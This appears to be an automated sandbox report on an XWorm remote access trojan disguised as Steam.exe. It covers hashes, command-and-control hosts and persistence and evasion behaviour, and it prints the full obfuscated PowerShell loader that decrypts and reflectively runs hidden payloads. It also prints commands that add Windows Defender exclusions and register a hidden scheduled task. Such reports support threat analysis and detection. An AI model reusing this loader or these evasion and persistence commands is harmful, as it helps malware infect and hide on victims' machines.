Analysis
  max time kernel:   1050s
  max time network:  1053s
  platform:          windows11-21h2_x64
  resource:          win11-20240802-en
  resource tags:     arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  submitted:         08/08/2024, 10:04
Behavioral tasks
  Task         Sample     Resource
  behavioral1  Steam.exe  win7-20240705-en
  behavioral2  Steam.exe  win10-20240404-en
  behavioral3  Steam.exe  win10v2004-20240802-en
General
  Target:  Steam.exe
  Size:    51KB
  MD5:     eb794f3819b32c9fbc747309bb04cd68
  SHA1:    a6c24bfb6c2ea4cdf10f0f54c0a4e8ac0380beb3
  SHA256:  e8fd34b40b83391a855905620e4beeb153d256df196b063bc7845d747f1e7d67
  SHA512:  0b6cf31c799513b4e0f5ac21180cc7a26451fc54504f03ace353a5a8c598885c594b3375e990ac442e08ffaa1f3e9692cbf6dfb8c035b4380497cefd57288aaf
  SSDEEP:  768:juMMmVn76G3rspEacCIQgttZX+2V2ltnq7oTmggkbm1t+tuXSWCalOIhu//t/:SMDnv7sKEIHLXyBqCmjkbmn/weOImF/
Malware Config
  Extracted: xworm
    tree-cleaning.gl.at.ply.gg:33027
    hard-tyler.gl.at.ply.gg:27490
    install_file: USB.exe
Signatures

Detect Xworm Payload (5 IoCs)
  resource                                                                      yara_rule
  behavioral4/memory/3568-0-0x0000000000500000-0x0000000000514000-memory.dmp    family_xworm
  behavioral4/memory/4572-22-0x00000200A4B10000-0x00000200A4BB6000-memory.dmp   family_xworm
  behavioral4/memory/888-53-0x000002AE2EAF0000-0x000002AE2EB40000-memory.dmp    family_xworm
  behavioral4/files/0x000200000002aa57-56.dat                                   family_xworm
  behavioral4/memory/1200-64-0x0000000000370000-0x00000000003BE000-memory.dmp   family_xworm
Blocklisted process makes network request (3 IoCs)
  flow  pid  Process
  34    888  powershell.exe
  36    888  powershell.exe
  38    888  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 11 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid   Process
  4624  powershell.exe
  4688  powershell.exe
  1556  powershell.exe
  5036  powershell.exe
  3368  powershell.exe
  840   powershell.exe
  2272  powershell.exe
  2528  powershell.exe
  1320  powershell.exe
  888   powershell.exe
  4572  powershell.exe
Drops startup file (3 IoCs)
  description                   ioc                                                                                          Process
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk  powershell.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk  XClient.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemprocess.lnk  powershell.exe
Executes dropped EXE (2 IoCs)
  pid   Process
  1200  XClient.exe
  5608  qvhxlm.exe
Adds Run key to start application (2 TTPs, 2 IoCs)
  description      ioc                                                                                                                                                                          Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"  powershell.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\systemprocess = "C:\\Users\\Admin\\AppData\\Local\\Temp\\systemprocess.exe"  XClient.exe
Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  3     ip-api.com
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                        Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  qvhxlm.exe
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                                   Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies registry class (8 IoCs)
  description      ioc  Process
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings  powershell.exe
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949  msedge.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox"  msedge.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe"  msedge.exe
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children  msedge.exe
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage  msedge.exe
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe  msedge.exe
  Key created      \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children  msedge.exe
Suspicious behavior: EnumeratesProcesses (37 IoCs)
  The report lists each pid/Process pair once per hit; the "entries" column gives how many times the pair appears.
  pid   Process              entries
  4572  powershell.exe       2
  1320  powershell.exe       2
  888   powershell.exe       3
  3368  powershell.exe       2
  840   powershell.exe       2
  2272  powershell.exe       2
  2528  powershell.exe       2
  4624  powershell.exe       2
  4688  powershell.exe       2
  1556  powershell.exe       2
  5036  powershell.exe       2
  1200  XClient.exe          1
  4800  msedge.exe           2
  1180  msedge.exe           2
  3740  msedge.exe           2
  4768  identity_helper.exe  2
  4192  msedge.exe           1
  2176  msedge.exe           4
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (19 IoCs)
  pid   Process     entries
  1180  msedge.exe  19
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token             pid   Process
  SeDebugPrivilege  3568  Steam.exe
  SeDebugPrivilege  4572  powershell.exe
  SeDebugPrivilege  1320  powershell.exe
  After these, the same set of tokens is listed for pid 1320 (powershell.exe) three times in succession; the third pass ends at "Token: 34" (64 entries listed in total):
  SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
Suspicious use of FindShellTrayWindow (25 IoCs)
  pid   Process     entries
  1180  msedge.exe  25
Suspicious use of SendNotifyMessage (12 IoCs)
  pid   Process     entries
  1180  msedge.exe  12
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  888   powershell.exe
  1200  XClient.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Each row is "PID <pid> wrote to memory of <target pid>"; the "entries" column gives how many times the row appears in the report.
  pid   Process         target pid  procid_target  entries
  3568  Steam.exe       4172        83             2
  4172  cmd.exe         4572        85             2
  4572  powershell.exe  1320        86             2
  4572  powershell.exe  2752        88             2
  2752  WScript.exe     4004        89             2
  4004  cmd.exe         888         91             2
  888   powershell.exe  1200        92             2
  888   powershell.exe  3368        93             2
  1200  XClient.exe     840         95             2
  888   powershell.exe  2272        97             2
  1200  XClient.exe     2528        99             2
  888   powershell.exe  4624        101            2
  1200  XClient.exe     4688        103            2
  888   powershell.exe  1556        105            2
  1200  XClient.exe     5036        107            2
  3568  Steam.exe       1180        109            2
  1180  msedge.exe      2996        110            2
  1180  msedge.exe      3076        111            30 (all remaining entries)
Processes
  Indentation follows the process tree; the number in brackets is the depth shown in the report.

[depth 1] C:\Users\Admin\AppData\Local\Temp\Steam.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3568

  [depth 2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sskcez.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 4172

    [depth 3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sskcez.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sskcez.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4572

      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_812_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_812.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1320
      [depth 4] C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_812.vbs"
        - Suspicious use of WriteProcessMemory
        PID: 2752

        [depth 5] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_812.bat" "
          - Suspicious use of WriteProcessMemory
          PID: 4004

          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s3PmOFekrbMURG659b9KZABAZEot2P8QYsLMjAdvpMI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5PDYrt8bAJlfBVhSQkNwKQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RVXUV=New-Object System.IO.MemoryStream(,$param_var); $qosdf=New-Object System.IO.MemoryStream; $HODhe=New-Object System.IO.Compression.GZipStream($RVXUV, [IO.Compression.CompressionMode]::Decompress); $HODhe.CopyTo($qosdf); $HODhe.Dispose(); $RVXUV.Dispose(); $qosdf.Dispose(); $qosdf.ToArray();}function execute_function($param_var,$param2_var){ $uFPjJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sKYTA=$uFPjJ.EntryPoint; $sKYTA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_812.bat';$zWgVI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_812.bat').Split([Environment]::NewLine);foreach ($GBYgo in $zWgVI) { if ($GBYgo.StartsWith(':: ')) { $yuPZQ=$GBYgo.Substring(3); break; }}$payloads_var=[string[]]$yuPZQ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Drops startup file
            - Adds Run key to start application
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
            PID: 888
            [depth 7] C:\Users\Admin\AppData\Local\Temp\XClient.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
              - Drops startup file
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of SetWindowsHookEx
              - Suspicious use of WriteProcessMemory
              PID: 1200

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                PID: 840

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                PID: 2528

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                PID: 4688

              [depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                PID: 5036

              [depth 8] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns,lol/serc
                PID: 1876

                [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd8
                  PID: 4580

              [depth 8] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/serc
                PID: 2352

                [depth 9] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd8
                  PID: 700
            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 3368

            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 2272

            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\systemprocess.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 4624

            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
              PID: 1556

            [depth 7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns,lol/serc
              PID: 3812

              [depth 8] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd8
                PID: 2184

            [depth 7] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/serc
              PID: 1768

              [depth 8] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd8
                PID: 3988
  [depth 2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://guns.lol/tuesday.cs
    - Enumerates system info in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID: 1180

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff828a23cb8,0x7ff828a23cc8,0x7ff828a23cd8
      PID: 2996

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
      PID: 3076

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
      PID: 4800

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
      PID: 4596

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:1
      PID: 1624

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
      PID: 3068

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
      PID: 1420

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
      PID: 2116

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
      PID: 4680

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:1
      PID: 1456

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
      PID: 492

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1724,2391263847185183526,10055501966151208281,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
      PID: 3916

    [depth 3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
